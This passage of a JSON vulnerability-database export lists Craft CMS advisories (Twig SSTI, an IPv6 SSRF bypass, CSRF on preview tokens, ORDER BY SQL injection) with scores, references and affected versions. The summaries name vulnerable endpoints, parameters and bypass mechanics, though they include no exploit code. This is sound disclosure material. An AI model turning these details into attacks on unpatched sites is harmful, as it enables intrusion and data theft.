ist.gov/vuln/detail/CVE-2026-41130","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41130"},{"reference_url":"https://github.com/advisories/GHSA-95wr-3f2v-v2wh","reference_id":"GHSA-95wr-3f2v-v2wh","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-95wr-3f2v-v2wh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110279?format=json","purl":"pkg:composer/craftcms/cms@4.17.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.9"},{"url":"http://public2.vulnerablecode.io/api/packages/110278?format=json","purl":"pkg:composer/craftcms/cms@5.9.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-asek-4gme-gug8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.15"}],"aliases":["CVE-2026-41130","GHSA-95wr-3f2v-v2wh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gzry-xtu5-ukhu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/57972?format=json","vulnerability_id":"VCID-h6t5-pdp5-8qhe","summary":"Craft CMS Potential Remote Code Execution via Twig SSTI\nNote that users must have administrator access to the Craft Control Panel, and [allowAdminChanges](https://craftcms.com/docs/5.x/reference/config/general.html#allowadminchanges) must be enabled for this to work, which is against Craft CMS' recommendations for any non-dev environment.\n\nhttps://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production\n\nNote: This is a follow-up to [GHSA-f3cw-hg6r-chfv](https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv)\n\nUsers should update to the patched versions (4.16.6 and 5.8.7) to mitigate the issue.\n\nResources: https://github.com/craftcms/cms/pull/17612","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-57811","reference_id":"","reference_type":"","scores":[{"value":"0.00227","scoring_system":"epss","scoring_elements":"0.45595","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-57811"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/e77f8a287dcdda41f1724f525d03542f18566cbc","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-08-25T18:05:02Z/"}],"url":"https://github.com/craftcms/cms/commit/e77f8a287dcdda41f1724f525d03542f18566cbc"},{"reference_url":"https://github.com/craftcms/cms/pull/17612","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-08-25T18:05:02Z/"}],"url":"https://github.com/craftcms/cms/pull/17612"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-57811","reference_id":"CVE-2025-57811","reference_type":"","scores":[{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-57811"},{"reference_url":"https://github.com/advisories/GHSA-crcq-738g-pqvc","reference_id":"GHSA-crcq-738g-pqvc","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-crcq-738g-pqvc"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-crcq-738g-pqvc","reference_id":"GHSA-crcq-738g-pqvc","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-08-25T18:05:02Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-crcq-738g-pqvc"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv","reference_id":"GHSA-f3cw-hg6r-chfv","reference_type":"","scores":[{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/86230?format=json","purl":"pkg:composer/craftcms/cms@4.16.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.16.6"},{"url":"http://public2.vulnerablecode.io/api/packages/74412?format=json","purl":"pkg:composer/craftcms/cms@5.8.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.7"}],"aliases":["CVE-2025-57811","GHSA-crcq-738g-pqvc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-h6t5-pdp5-8qhe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50333?format=json","vulnerability_id":"VCID-hkp9-3hzv-quhk","summary":"Craft CMS: Cloud Metadata SSRF Protection Bypass via IPv6 Resolution\nThe SSRF validation in Craft CMS’s GraphQL Asset mutation uses `gethostbyname()`, which only resolves IPv4 addresses. When a hostname has only AAAA (IPv6) records, the function returns the hostname string itself, causing the blocklist comparison to always fail and completely bypassing SSRF protection.\n\nThis is a bypass of the security fix for CVE-2025-68437 ([GHSA-x27p-wfqw-hfcc](https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc)).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27129","reference_id":"","reference_type":"","scores":[{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01541","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27129"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/2825388b4f32fb1c9bd709027a1a1fd192d709a3","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-02-28T02:16:52Z/"}],"url":"https://github.com/craftcms/cms/commit/2825388b4f32fb1c9bd709027a1a1fd192d709a3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27129","reference_id":"CVE-2026-27129","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27129"},{"reference_url":"https://github.com/advisories/GHSA-v2gc-rm6g-wrw9","reference_id":"GHSA-v2gc-rm6g-wrw9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v2gc-rm6g-wrw9"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-v2gc-rm6g-wrw9","reference_id":"GHSA-v2gc-rm6g-wrw9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-02-28T02:16:52Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-v2gc-rm6g-wrw9"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc","reference_id":"GHSA-x27p-wfqw-hfcc","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-02-28T02:16:52Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74189?format=json","purl":"pkg:composer/craftcms/cms@4.16.19","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.16.19"},{"url":"http://public2.vulnerablecode.io/api/packages/74188?format=json","purl":"pkg:composer/craftcms/cms@5.8.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.23"}],"aliases":["CVE-2026-27129","GHSA-v2gc-rm6g-wrw9"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hkp9-3hzv-quhk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50790?format=json","vulnerability_id":"VCID-hyct-5gap-7kdu","summary":"Craft CMS has a potential information disclosure vulnerability in preview tokens\nCraft CMS has a CSRF issue in the preview token endpoint at `/actions/preview/create-token`.  The endpoint accepts an attacker-supplied `previewToken`.\n\nBecause the action does not require POST and does not enforce a CSRF token, an attacker can force a logged-in victim editor to mint a preview token chosen by the attacker.\n\nThat token can then be used by the attacker (without authentication) to access previewed/unpublished content tied to the victim’s authorized preview scope.\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-29113","reference_id":"","reference_type":"","scores":[{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00694","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-29113"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/6a88468dc35a27cccc8fef254f415a447d4a07cc","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T20:05:03Z/"}],"url":"https://github.com/craftcms/cms/commit/6a88468dc35a27cccc8fef254f415a447d4a07cc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29113","reference_id":"CVE-2026-29113","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29113"},{"reference_url":"https://github.com/advisories/GHSA-vg3j-hpm9-8v5v","reference_id":"GHSA-vg3j-hpm9-8v5v","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vg3j-hpm9-8v5v"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-vg3j-hpm9-8v5v","reference_id":"GHSA-vg3j-hpm9-8v5v","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T20:05:03Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-vg3j-hpm9-8v5v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74586?format=json","purl":"pkg:composer/craftcms/cms@4.17.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.4"},{"url":"http://public2.vulnerablecode.io/api/packages/74587?format=json","purl":"pkg:composer/craftcms/cms@5.9.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.7"}],"aliases":["CVE-2026-29113","GHSA-vg3j-hpm9-8v5v"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hyct-5gap-7kdu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50071?format=json","vulnerability_id":"VCID-jeyh-3jxd-z3g6","summary":"Craft CMS Vulnerable to SQL Injection in Element Indexes via `criteria[orderBy]`\nThe `element-indexes/get-elements` endpoint is vulnerable to **SQL Injection** via the `criteria[orderBy]` parameter (JSON body). The application fails to sanitize this input before using it in the database query.\nAn attacker with **Control Panel access** can inject arbitrary SQL into the `ORDER BY` clause by omitting `viewState[order]` (or setting both to the same payload).\n\n> [!NOTE]\n> The `ORDER BY` clause executes per row. `SLEEP(1)` on 10 rows = 10s delay.\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25495","reference_id":"","reference_type":"","scores":[{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03183","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25495"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/96c60d775c644ff0a0276da52fe29e11d4cd38d2","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-10T15:32:10Z/"}],"url